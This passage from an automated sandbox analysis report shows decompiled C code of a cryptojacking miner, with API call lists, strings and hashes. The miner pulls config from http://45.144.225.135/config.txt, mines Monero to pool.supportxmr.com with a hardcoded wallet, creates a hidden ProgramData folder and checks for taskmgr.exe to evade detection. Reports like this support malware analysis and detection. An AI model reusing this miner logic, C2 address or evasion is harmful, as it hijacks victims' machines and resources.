					if(_t61 != 0xffffffff) {
						_t66 = 0;
						_t31 = LoadLibraryA("kernel32.dll");
						_v12 = _t31;
						if(_t31 != 0) {
							_t66 = GetProcAddress(_t31, "ProcessIdToSessionId");
						}
						Process32First(_t61,  &_v308);
						_t34 = E013C8DD0();
						_t62 = _a8;
						if(_t34 == 0 || _t66 == 0) {
							L10:
							_t69 = 1;
							 *_t62 = _v300;
						} else {
							 *_t66(_v300,  &_a4);
							if(_a4 != _t69) {
								_t55 = E013C1740("csrss.exe",  &_v272);
								_t72 = _t72 + 8;
								if(_t55 != 0) {
									_t57 = E013C1740("winlogon.exe",  &_v272);
									_t72 = _t72 + 8;
									if(_t57 != 0) {
										goto L10;
									}
								}
							}
						}
						while(Process32Next(_v8,  &_v308) != 0) {
							if(E013C8DD0() == 0 || _t66 == 0) {
								L18:
								 *((intOrPtr*)(_t62 + _t69 * 4)) = _v300;
								_t69 = _t69 + 1;
								if(_t69 < _a12) {
									goto L19;
								}
							} else {
								 *_t66(_v300,  &_a4);
								if(_a4 == 0) {
									goto L19;
								} else {
									_t49 = E013C1740("csrss.exe",  &_v272);
									_t72 = _t72 + 8;
									if(_t49 == 0) {
										goto L19;
									} else {
										_t51 = E013C1740("winlogon.exe",  &_v272);
										_t72 = _t72 + 8;
										if(_t51 == 0) {
											goto L19;
										} else {
											goto L18;
										}
									}
								}
							}
							goto L20;
							L19:
						}
						L20:
						CloseHandle(_v8);
						_t39 = _v12;
						if(_t39 != 0) {
							FreeLibrary(_t39);
						}
						return _t69;
					} else {
						return 0;
					}
				}
			}

0x013c80ed
0x013c8261
0x013c80f3
0x013c80f5
0x013c80f7
0x013c8104
0x013c810c
0x013c810e
0x013c8114
0x013c8124
0x013c8126
0x013c812c
0x013c8131
0x013c813f
0x013c813f
0x013c8149
0x013c814e
0x013c8153
0x013c8158
0x013c819f
0x013c81a5
0x013c81aa
0x013c815e
0x013c8168
0x013c816d
0x013c817b
0x013c8180
0x013c8185
0x013c8193
0x013c8198
0x013c819d
0x00000000
0x00000000
0x013c819d
0x013c8185
0x013c816d
0x013c81bd
0x013c81c7
0x013c820f
0x013c8215
0x013c8218
0x013c821c
0x00000000
0x00000000
0x013c81cd
0x013c81d7
0x013c81dd
0x00000000
0x013c81df
0x013c81eb
0x013c81f0
0x013c81f5
0x00000000
0x013c81f7
0x013c8203
0x013c8208
0x013c820d
0x00000000
0x00000000
0x00000000
0x00000000
0x013c820d
0x013c81f5
0x013c81dd
0x00000000
0x013c821e
0x013c822d
0x013c8231
0x013c8234
0x013c823a
0x013c8240
0x013c8243
0x013c8243
0x013c8250
0x013c8116
0x013c811d
0x013c811d
0x013c8114

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,73BCF7F0,00000000), ref: 013C8107
LoadLibraryA.KERNEL32(kernel32.dll,013C67D1,00000002,00000000,73BCF7F0,00000000), ref: 013C8126
GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 013C8139
Process32First.KERNEL32(00000000,00000128), ref: 013C8149
Process32Next.KERNEL32(00001000,00000128,00000000,00000128), ref: 013C81B6
Process32Next.KERNEL32(00001000,00000128,00001000,00000128,00000000,00000128), ref: 013C8228
CloseHandle.KERNEL32(00001000,00001000,00000128,00000000,00000128), ref: 013C8234
FreeLibrary.KERNEL32(00000000), ref: 013C8243

Strings

kernel32.dll, xrefs: 013C811F
winlogon.exe, xrefs: 013C81FE
explorer.exe, xrefs: 013C8251
csrss.exe, xrefs: 013C81E6
ProcessIdToSessionId, xrefs: 013C8133
winlogon.exe, xrefs: 013C818E
csrss.exe, xrefs: 013C8176

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Process32$LibraryNext$AddressCloseCreateFirstFreeHandleLoadProcSnapshotToolhelp32
String ID: ProcessIdToSessionId$csrss.exe$csrss.exe$explorer.exe$kernel32.dll$winlogon.exe$winlogon.exe
API String ID: 2254598907-4289567422
Opcode ID: 05a3c5b858305b40cb972ab39ba67bc380f295c48a1a2c0d4941e6d6b53daa58
Instruction ID: 26ceb8995558f1aad6640ff563880779d9777ad258f1b5846c1b886f92d6318b
Opcode Fuzzy Hash: 05a3c5b858305b40cb972ab39ba67bc380f295c48a1a2c0d4941e6d6b53daa58
Instruction Fuzzy Hash: 3241627590021DABEF21AF68DC49BE97BACAF54B59F0501EDED0892240EB31DF40DB91

Uniqueness

Uniqueness Score: -1.00%

Function 013C8B20, Relevance: 24.2, APIs: 16, Instructions: 152
encryptionfileCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E013C8B20(WCHAR* _a4, intOrPtr _a8) {
				long* _v8;
				int _v12;
				long _v16;
				int _v20;
				char _v24;
				char _v56;
				void _v1080;
				char _t39;
				long** _t42;
				int* _t43;
				int _t46;
				char* _t51;
				void* _t60;
				intOrPtr* _t69;
				int _t70;
				long _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr _t80;
				void* _t82;
				void* _t87;

				asm("movups xmm0, [0x13caa14]");
				_t39 =  *0x13caa24; // 0x0
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				asm("movups [ebp-0x24], xmm0");
				_v24 = _t39;
				_t82 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x8000000, 0);
				if(_t82 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_t42 =  &_v8;
					__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000);
					if(_t42 != 0) {
						_t43 =  &_v12;
						__imp__CryptCreateHash(_v8, 0x8003, 0, 0, _t43);
						if(_t43 != 0) {
							_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, 0);
							if(_t46 == 0) {
								L11:
								_push(0);
								goto L12;
							} else {
								_t69 = __imp__CryptHashData;
								while(1) {
									_t72 = _v16;
									if(_t72 == 0) {
										break;
									}
									_t60 =  *_t69(_v12,  &_v1080, _t72, 0);
									_push(0);
									if(_t60 == 0) {
										L12:
										CryptReleaseContext(_v8);
										__imp__CryptDestroyHash(_v12);
										CloseHandle(_t82);
										L13:
										return 0;
									} else {
										_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, ??);
										if(_t46 != 0) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L20;
								}
								if(_t46 == 0) {
									goto L11;
								} else {
									_v20 = 0x10;
									_t51 =  &_v56;
									__imp__CryptGetHashParam(_v12, 2, _t51,  &_v20, 0);
									if(_t51 == 0) {
										goto L13;
									} else {
										_t70 = _v20;
										_t75 = 0;
										if(_t70 != 0) {
											_t80 = _a8;
											asm("o16 nop [eax+eax]");
											do {
												_t73 =  *(_t87 + _t75 - 0x34) & 0x000000ff;
												 *((char*)(_t80 + _t75 * 2)) =  *(_t87 + (_t73 >> 4) - 0x24) & 0x000000ff;
												 *((char*)(_t80 + 1 + _t75 * 2)) =  *(_t87 + (_t73 & 0x0000000f) - 0x24) & 0x000000ff;
												_t75 = _t75 + 1;
											} while (_t75 < _t70);
										}
										__imp__CryptDestroyHash(_v12);
										CryptReleaseContext(_v8, 0);
										CloseHandle(_t82);
										return 1;
									}
								}
							}
						} else {
							CloseHandle(_t82);
							CryptReleaseContext(_v8, 0);
							return 0;
						}
					} else {
						CloseHandle(_t82);
						goto L3;
					}
				}
				L20:
			}

0x013c8b29
0x013c8b30
0x013c8b4b
0x013c8b52
0x013c8b59
0x013c8b60
0x013c8b67
0x013c8b6b
0x013c8b74
0x013c8b79
0x013c8b9b
0x013c8ba1
0x013c8b7b
0x013c8b86
0x013c8b8a
0x013c8b92
0x013c8ba2
0x013c8bb2
0x013c8bba
0x013c8bf0
0x013c8bf4
0x013c8c33
0x013c8c33
0x00000000
0x013c8bf6
0x013c8bf6
0x013c8c00
0x013c8c00
0x013c8c05
0x00000000
0x00000000
0x013c8c14
0x013c8c16
0x013c8c1a
0x013c8c35
0x013c8c38
0x013c8c41
0x013c8c48
0x013c8c4e
0x013c8c56
0x013c8c1c
0x013c8c2d
0x013c8c31
0x00000000
0x00000000
0x00000000
0x00000000
0x013c8c31
0x00000000
0x013c8c1a
0x013c8c59
0x00000000
0x013c8c5b
0x013c8c60
0x013c8c68
0x013c8c71
0x013c8c79
0x00000000
0x013c8c7b
0x013c8c7b
0x013c8c7e
0x013c8c82
0x013c8c84
0x013c8c87
0x013c8c90
0x013c8c90
0x013c8ca2
0x013c8caa
0x013c8cae
0x013c8caf
0x013c8c90
0x013c8cb6
0x013c8cc1
0x013c8cc8
0x013c8cd9
0x013c8cd9
0x013c8c79
0x013c8c59
0x013c8bbc
0x013c8bbd
0x013c8bc8
0x013c8bd4
0x013c8bd4
0x013c8b94
0x013c8b95
0x00000000
0x013c8b95
0x013c8b92
0x00000000

APIs

CreateFileW.KERNEL32(013C363E,80000000,00000001,00000000,00000003,08000000,00000000), ref: 013C8B6E
CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 013C8B8A
CloseHandle.KERNEL32(00000000), ref: 013C8B95
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 013C8BB2
CloseHandle.KERNEL32(00000000), ref: 013C8BBD
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013C8BC8
ReadFile.KERNEL32(00000000,?,00000400,00000000,00000000,?,00000000), ref: 013C8BF0
CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 013C8C14
ReadFile.KERNEL32(00000000,?,00000400,00000000,00000000,?,00000000), ref: 013C8C2D
CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 013C8C38
CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 013C8C41
CloseHandle.KERNEL32(00000000,?,00000000), ref: 013C8C48
CryptGetHashParam.ADVAPI32(00000000,00000002,?,00000000,00000000,?,00000000), ref: 013C8C71
CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 013C8CB6
CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 013C8CC1
CloseHandle.KERNEL32(00000000,?,00000000), ref: 013C8CC8

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Crypt$Hash$CloseContextHandle$FileRelease$CreateDestroyRead$AcquireDataParam
String ID:
API String ID: 2794010843-0
Opcode ID: 5744d78843aacabb19df4dba6b3804ce2fc923d8eb234d2843fd15cd37586678
Instruction ID: 011ae381eab6279ee19d4ef13ebe23a2ec1b7c5300b475d6413e6d7df975b6bf
Opcode Fuzzy Hash: 5744d78843aacabb19df4dba6b3804ce2fc923d8eb234d2843fd15cd37586678
Instruction Fuzzy Hash: BF51B271A01218BFEF219BA9DD45FEDBBBCEF08708F1140A5FA04E6180D771AB558B64

Uniqueness

Uniqueness Score: -1.00%

Function 013C4470, Relevance: 79.2, APIs: 28, Strings: 17, Instructions: 457
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			_entry_() {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				intOrPtr _v16;
				char _v20;
				int _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				long _v32;
				long _v36;
				char _v38;
				short _v40;
				char _v48;
				char _v72;
				char _v592;
				char _v1112;
				char _v2136;
				char _v3160;
				void _v7224;
				long _t56;
				long _t66;
				void* _t72;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t82;
				void* _t84;
				void* _t89;
				void* _t90;
				void* _t91;
				intOrPtr _t93;
				void* _t94;
				long _t96;
				long _t99;
				void* _t102;
				char _t110;
				char _t114;
				char _t117;
				char _t119;
				void* _t125;
				void* _t137;
				void* _t139;
				void* _t140;
				signed int _t148;
				char _t150;
				void* _t153;
				void* _t158;
				intOrPtr _t160;
				struct _SECURITY_ATTRIBUTES* _t161;
				void* _t166;
				struct _SECURITY_ATTRIBUTES* _t168;
				intOrPtr _t169;
				void* _t171;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t196;
				void* _t223;
				void* _t225;
				void* _t226;
				void* _t234;

				_v8 = 0;
				_v12 = 0;
				_v28 = 0;
				_t56 = GetTickCount();
				_t150 = 0;
				_v32 = _t56;
				_v36 = _t56;
				_v24 = 0;
				 *0x1592df4 = 0;
				E013C1670(0x1592128, 0, 0xcc8);
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x10], xmm0");
				E013C1BB0( &_v7224, 0, 0xfe0);
				memcpy("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  &_v7224, 0x3f8 << 2);
				_t152 = 0;
				SetErrorMode(SetErrorMode(2) | 0x00000002);
				E013C17E0(0x159206c, "e9c1286a28d82a2d0ee6");
				_t174 = _t171 + 0x2c;
				if(CreateMutexA(0, 0, 0x159206c) == 0) {
					ExitProcess(0x1e);
				}
				_t158 = GetLastError;
				_t66 = GetLastError();
				_t191 = _t66 - 0xb7;
				if(_t66 == 0xb7) {
					ExitProcess(0x1f);
				}
				E013C3220(0, SetErrorMode, _t191);
				_t166 = CommandLineToArgvW(GetCommandLineW(),  &_v24);
				if(_t166 != 0 && _v24 > 1) {
					_t148 = E013C19C0( *((intOrPtr*)(_t166 + 4)), L"--show-window");
					_t174 = _t174 + 8;
					asm("sbb eax, eax");
					 *0x1591bb8 =  *0x1591bb8 &  ~_t148;
				}
				LocalFree(_t166);
				_t72 = E013C1000(_t152, _t158, _t166,  *0x1591314);
				_t175 = _t174 + 4;
				_t195 = _t72;
				if(_t72 != 0) {
					E013C8070(_t152, _t195, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
					_t176 = _t175 + 4;
					_t196 =  *0x1591bc0 - _t150; // 0x0
					if(_t196 != 0) {
						E013C17E0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						_t176 = _t176 + 8;
					}
					_t74 = E013C1600(0x159204c, "LKBNMTFJgl");
					_t177 = _t176 + 8;
					if(_t74 != 0) {
						_t75 = E013C1600("csrss.exe", "csrss.exe");
						_t178 = _t177 + 8;
						if(_t75 != 0) {
							_t76 = E013C1600("viTRMUuKeV", "viTRMUuKeV");
							_t179 = _t178 + 8;
							if(_t76 != 0) {
								_t77 = E013C7FA0(_t152, "C:\ProgramData\LKBNMTFJgl", 0x13caae0, 0x23);
								_t180 = _t179 + 0xc;
								if(_t77 != 0) {
									E013C1970("C:\ProgramData\LKBNMTFJgl", "\\");
									E013C1970("C:\ProgramData\LKBNMTFJgl", 0x159204c);
									_t181 = _t180 + 0x10;
									if(CreateDirectoryW(?str?, 0) != 0 || GetLastError() == 0xb7) {
										if(E013C8DD0() != 0 &&  *0x159210c == 1) {
											 *0x159211c = CreateThread(0, 0, E013C8450, 0, 0, 0);
										}
										_t82 = E013C17B0("FALSE", "http://45.144.225.135/config.txt");
										_t182 = _t181 + 8;
										if(_t82 == 0) {
											L33:
											_t84 = E013C3150( &_v1112);
											_t183 = _t182 + 4;
											if(_t84 != 0) {
												E013C30B0( &_v1112,  &_v2136,  &_v3160);
												__imp__SetThreadExecutionState(0x80000041, 0);
												_t89 = E013C3CA0(_t152, _t153, 1, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x15912c0,  *0x159131c);
												_t185 = _t183 + 0x24;
												if(_t89 == 0) {
													L91:
													ExitProcess(0x3d);
												}
												_t90 = E013C3CA0(_t152, _t153, 0, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x15912c0,  *0x159131c);
												_t186 = _t185 + 0x14;
												if(_t90 == 0) {
													goto L91;
												}
												L38:
												while(1) {
													if( *0x1591300 != 0) {
														_t169 = _v28;
														if(_t169 == 0) {
															_t96 = GetTickCount();
															_t215 = _t96 - _v36 - 0x4e20;
															if(_t96 - _v36 > 0x4e20) {
																E013C65D0(_t215);
																_t170 =  !=  ? 1 : _t169;
																_v28 =  !=  ? 1 : _t169;
															}
														}
													}
													if( *0x1591308 == 3) {
														_t160 =  *0x1591310; // 0x7530
														_t161 = _t160 + 1;
														__eflags = _t161;
													} else {
														_t161 = E013C8040();
													}
													_t91 = E013C8A50(_t150);
													_t187 = _t186 + 4;
													_t168 =  ==  ? 1 : _t91;
													if( *0x1591304 == 0) {
														_t93 = _v12;
													} else {
														_t93 = E013C7EF0("taskmgr.exe");
														_t187 = _t187 + 4;
														_v12 = _t93;
													}
													if(_t150 == 0 || _t168 == 0) {
														if(_t93 != 0) {
															goto L58;
														}
														_t223 =  *0x1591320 - _t93; // 0x0
														if(_t223 != 0 ||  *0x1592110 != _t93) {
															goto L58;
														} else {
															_t225 = _t161 -  *0x1591310; // 0x7530
															if(_t225 <= 0) {
																__eflags =  *0x1591308;
																if( *0x1591308 != 0) {
																	_t117 = E013C3050(_t150, _t152,  &_v2136, 0);
																	_t187 = _t187 + 8;
																	_t150 = _t117;
																	_t168 = 1;
																}
																_v8 = 0;
																goto L68;
															}
															_t119 = E013C3050(_t150, _t152,  &_v3160, _t93);
															_t187 = _t187 + 8;
															_v8 = 1;
															_t150 = _t119;
															_t168 = 1;
															goto L59;
														}
													} else {
														L58:
														__eflags = _v8;
														if(_v8 == 0) {
															L68:
															_t234 = _t161 -  *0x1591310; // 0x7530
															if(_t234 <= 0) {
																L75:
																__eflags = _v12;
																if(_v12 == 0) {
																	L77:
																	if( *0x1591320 == 0) {
																		L79:
																		if( *0x1592110 == 0) {
																			L82:
																			_t94 = E013C17B0("FALSE", "http://45.144.225.135/config.txt");
																			_t186 = _t187 + 8;
																			if(_t94 != 0) {
																				_t99 = GetTickCount();
																				_t152 =  *0x1591bb4 * 0xea60;
																				_t245 = _t99 - _v32 -  *0x1591bb4 * 0xea60;
																				if(_t99 - _v32 >  *0x1591bb4 * 0xea60) {
																					_v32 = GetTickCount();
																					_t102 = E013C4DE0(_t152, _t153, _t245, "http://45.144.225.135/config.txt", "FALSE", 0x1592128, _t150, _t168);
																					_t186 = _t186 + 0x14;
																					if(_t102 != 0) {
																						if(E013C39B0(_t153) != 0) {
																							if(_t168 != 0) {
																								E013C8730(_t150);
																								_t186 = _t186 + 4;
																							}
																							E013C3CA0(_t152, _t153, 1, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x15912c0,  *0x159131c);
																							E013C3CA0(_t152, _t153, 0, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x15912c0,  *0x159131c);
																							_t186 = _t186 + 0x28;
																						}
																						E013C3B50(_t153, _v20, _v16);
																						_t186 = _t186 + 8;
																					}
																				}
																			}
																			Sleep(0xfa0);
																			continue;
																		}
																		L80:
																		if(_t168 == 0) {
																			goto L82;
																		}
																		L81:
																		E013C8730(_t150);
																		_t187 = _t187 + 4;
																		_t168 = 0;
																		goto L82;
																	}
																	L78:
																	if(_t168 != 0) {
																		goto L81;
																	}
																	goto L79;
																}
																L76:
																__eflags = _t168;
																if(_t168 != 0) {
																	goto L81;
																}
																goto L77;
															}
															if(_v12 != 0) {
																goto L76;
															}
															if( *0x1591320 != 0) {
																goto L78;
															}
															if( *0x1592110 != 0) {
																goto L80;
															}
															if(_t168 != 0) {
																E013C8730(_t150);
																_t187 = _t187 + 4;
															}
															_t110 = E013C3050(_t150, _t152,  &_v3160, 0);
															_t187 = _t187 + 8;
															_v8 = 1;
															_t150 = _t110;
															_t168 = 1;
															goto L77;
														}
														L59:
														_t226 = _t161 -  *0x1591310; // 0x7530
														if(_t226 > 0) {
															goto L75;
														}
														if(_v12 != 0) {
															goto L76;
														}
														if( *0x1591320 != 0) {
															goto L78;
														}
														if( *0x1592110 != 0) {
															goto L80;
														}
														if(_t168 != 0) {
															E013C8730(_t150);
															_t187 = _t187 + 4;
															_t168 = 0;
														}
														if( *0x1591308 != 0) {
															_t114 = E013C3050(_t150, _t152,  &_v2136, 0);
															_t187 = _t187 + 8;
															_t150 = _t114;
															_t168 = 1;
														}
														_v8 = 0;
														goto L68;
													}
												}
											}
											ExitProcess(0x1c);
										} else {
											asm("movq xmm0, [0x159206c]");
											_v40 =  *0x1592074;
											asm("movq [ebp-0x2c], xmm0");
											_v38 = _t150;
											E013C1A00( &_v592, "C:\ProgramData\LKBNMTFJgl");
											_t125 = E013C1600( &_v72,  &_v48);
											_t183 = _t182 + 0x10;
											if(_t125 == 0) {
												ExitProcess(0x2f);
											}
											E013C1970( &_v592, "\\");
											E013C1970( &_v592,  &_v72);
											E013C1970( &_v592, "_");
											E013C1970( &_v592, L"3.1.0");
											_t188 = _t183 + 0x20;
											_t137 =  *0x15910b8( &_v592,  &_v20, 0, 0);
											_t207 = _t137 - 1;
											if(_t137 == 1) {
												_t139 = E013C37E0(_t207,  &_v592);
												_t189 = _t188 + 4;
												_t208 = _t139;
												if(_t139 != 0) {
													E013C39B0(_t153);
													_push(_v16);
													E013C3680(_t153, _v20);
													_t189 = _t189 + 8;
												}
												_t140 = E013C4DE0(_t152, _t153, _t208, "http://45.144.225.135/config.txt", "FALSE", 0x1592128, 0, 0);
												_t182 = _t189 + 0x14;
												if(_t140 != 0) {
													E013C39B0(_t153);
													E013C3B50(_t153, _v20, _v16);
													_t182 = _t182 + 8;
												}
												goto L33;
											}
											ExitProcess(0x3c);
										}
									} else {
										ExitProcess(0x32);
									}
								}
								ExitProcess(0x31);
							}
							ExitProcess(0x30);
						}
						ExitProcess(0x30);
					} else {
						ExitProcess(0x30);
					}
				}
				ExitProcess(0x3b);
			}

0x013c447e
0x013c4481
0x013c4484
0x013c4487
0x013c448d
0x013c448f
0x013c449d
0x013c44a0
0x013c44a3
0x013c44a9
0x013c44b9
0x013c44be
0x013c44c3
0x013c44db
0x013c44db
0x013c44eb
0x013c44f7
0x013c44fc
0x013c450e
0x013c4512
0x013c4512
0x013c4518
0x013c451e
0x013c4520
0x013c4525
0x013c4529
0x013c4529
0x013c452f
0x013c4545
0x013c4549
0x013c4559
0x013c455e
0x013c4563
0x013c4565
0x013c4565
0x013c456c
0x013c4578
0x013c457d
0x013c4580
0x013c4582
0x013c4591
0x013c4596
0x013c4599
0x013c459f
0x013c45ab
0x013c45b0
0x013c45b0
0x013c45bd
0x013c45c2
0x013c45c7
0x013c45db
0x013c45e0
0x013c45e5
0x013c45f9
0x013c45fe
0x013c4603
0x013c4619
0x013c461e
0x013c4623
0x013c4637
0x013c4646
0x013c464b
0x013c465d
0x013c4677
0x013c4697
0x013c4697
0x013c46a6
0x013c46ab
0x013c46b0
0x013c47b8
0x013c47bf
0x013c47c4
0x013c47c9
0x013c47f2
0x013c47ff
0x013c481c
0x013c4821
0x013c4826
0x013c4af0
0x013c4af2
0x013c4af2
0x013c4843
0x013c4848
0x013c484d
0x00000000
0x00000000
0x00000000
0x013c4853
0x013c485f
0x013c4861
0x013c4866
0x013c4868
0x013c4871
0x013c4876
0x013c4878
0x013c487f
0x013c4882
0x013c4882
0x013c4876
0x013c4866
0x013c488c
0x013c4897
0x013c489d
0x013c489d
0x013c488e
0x013c4893
0x013c4893
0x013c489f
0x013c48a6
0x013c48b1
0x013c48bb
0x013c48cf
0x013c48bd
0x013c48c2
0x013c48c7
0x013c48ca
0x013c48ca
0x013c48d4
0x013c48dc
0x00000000
0x00000000
0x013c48de
0x013c48e4
0x00000000
0x013c48ee
0x013c48ee
0x013c48f4
0x013c4916
0x013c491d
0x013c4928
0x013c492d
0x013c4930
0x013c4932
0x013c4932
0x013c4937
0x00000000
0x013c4937
0x013c48fe
0x013c4903
0x013c4906
0x013c490d
0x013c490f
0x00000000
0x013c490f
0x013c4940
0x013c4940
0x013c4940
0x013c4944
0x013c49ab
0x013c49ab
0x013c49b1
0x013c49f9
0x013c49f9
0x013c49fd
0x013c4a03
0x013c4a0a
0x013c4a10
0x013c4a17
0x013c4a28
0x013c4a32
0x013c4a37
0x013c4a3c
0x013c4a48
0x013c4a4a
0x013c4a57
0x013c4a59
0x013c4a72
0x013c4a75
0x013c4a7a
0x013c4a7f
0x013c4a88
0x013c4a8c
0x013c4a8f
0x013c4a94
0x013c4a94
0x013c4aae
0x013c4aca
0x013c4acf
0x013c4acf
0x013c4ad8
0x013c4add
0x013c4add
0x013c4a7f
0x013c4a59
0x013c4ae5
0x00000000
0x013c4ae5
0x013c4a19
0x013c4a1b
0x00000000
0x00000000
0x013c4a1d
0x013c4a1e
0x013c4a23
0x013c4a26
0x00000000
0x013c4a26
0x013c4a0c
0x013c4a0e
0x00000000
0x00000000
0x00000000
0x013c4a0e
0x013c49ff
0x013c49ff
0x013c4a01
0x00000000
0x00000000
0x00000000
0x013c4a01
0x013c49b7
0x00000000
0x00000000
0x013c49c0
0x00000000
0x00000000
0x013c49c9
0x00000000
0x00000000
0x013c49cd
0x013c49d0
0x013c49d5
0x013c49d5
0x013c49e1
0x013c49e6
0x013c49e9
0x013c49f0
0x013c49f2
0x00000000
0x013c49f2
0x013c4946
0x013c4946
0x013c494c
0x00000000
0x00000000
0x013c4956
0x00000000
0x00000000
0x013c4963
0x00000000
0x00000000
0x013c4970
0x00000000
0x00000000
0x013c4978
0x013c497b
0x013c4980
0x013c4983
0x013c4983
0x013c498c
0x013c4997
0x013c499c
0x013c499f
0x013c49a1
0x013c49a1
0x013c49a8
0x00000000
0x013c49a8
0x013c48d4
0x013c4853
0x013c47cd
0x013c46b6
0x013c46bc
0x013c46c4
0x013c46d4
0x013c46d9
0x013c46dc
0x013c46e9
0x013c46ee
0x013c46f3
0x013c47d5
0x013c47d5
0x013c4705
0x013c4715
0x013c4726
0x013c4737
0x013c473c
0x013c474e
0x013c4754
0x013c4756
0x013c4767
0x013c476c
0x013c476f
0x013c4771
0x013c4773
0x013c4778
0x013c477e
0x013c4783
0x013c4783
0x013c4799
0x013c479e
0x013c47a3
0x013c47a5
0x013c47b0
0x013c47b5
0x013c47b5
0x00000000
0x013c47a3
0x013c475a
0x013c475a
0x013c4668
0x013c466a
0x013c466a
0x013c465d
0x013c4627
0x013c4627
0x013c4607
0x013c4607
0x013c45e9
0x013c45c9
0x013c45cb
0x013c45cb
0x013c45c7
0x013c4586

APIs

GetTickCount.KERNEL32 ref: 013C4487
SetErrorMode.KERNEL32(00000002), ref: 013C44E5
SetErrorMode.KERNEL32(00000000), ref: 013C44EB
CreateMutexA.KERNEL32(00000000,00000000,0159206C), ref: 013C4506
ExitProcess.KERNEL32 ref: 013C4512
GetLastError.KERNEL32 ref: 013C451E
ExitProcess.KERNEL32 ref: 013C4529

Strings

LKBNMTFJgl, xrefs: 013C45B3
http://45.144.225.135/config.txt, xrefs: 013C469C, 013C4794, 013C4A28, 013C4A6D
viTRMUuKeV, xrefs: 013C45F4
FALSE, xrefs: 013C46A1
C:\ProgramData\LKBNMTFJgl, xrefs: 013C4614, 013C4632, 013C4641, 013C4650, 013C46CE
taskmgr.exe, xrefs: 013C48BD
3.1.0, xrefs: 013C4731
d06ed635-68f6-4e9a-955c-4899f5f57b9a, xrefs: 013C458C, 013C45A1
FALSE, xrefs: 013C478F, 013C4A68
csrss.exe, xrefs: 013C45D6
e9c1286a28d82a2d0ee6, xrefs: 013C44ED
FALSE, xrefs: 013C4A2D
viTRMUuKeV, xrefs: 013C45EF
pool.supportxmr.com:3333, xrefs: 013C4815, 013C483C, 013C4AA7, 013C4AC3
--show-window, xrefs: 013C4551
48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW, xrefs: 013C44D6, 013C45A6, 013C4810, 013C4837, 013C4AA2, 013C4ABE
csrss.exe, xrefs: 013C45D1

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Error$ExitModeProcess$CountCreateLastMutexTick
String ID: --show-window$3.1.0$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW$C:\ProgramData\LKBNMTFJgl$FALSE$FALSE$FALSE$LKBNMTFJgl$csrss.exe$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$e9c1286a28d82a2d0ee6$http://45.144.225.135/config.txt$pool.supportxmr.com:3333$taskmgr.exe$viTRMUuKeV$viTRMUuKeV
API String ID: 3615071802-2903677349
Opcode ID: d91a55741af52f64870b95912e240e6caaa797bf625d0ec4d63889fbf1d968af
Instruction ID: 94ee6f4247dca09d08b2cc46c1a660e1458bad7727ada0d2de23d5a6ac5beecf
Opcode Fuzzy Hash: d91a55741af52f64870b95912e240e6caaa797bf625d0ec4d63889fbf1d968af
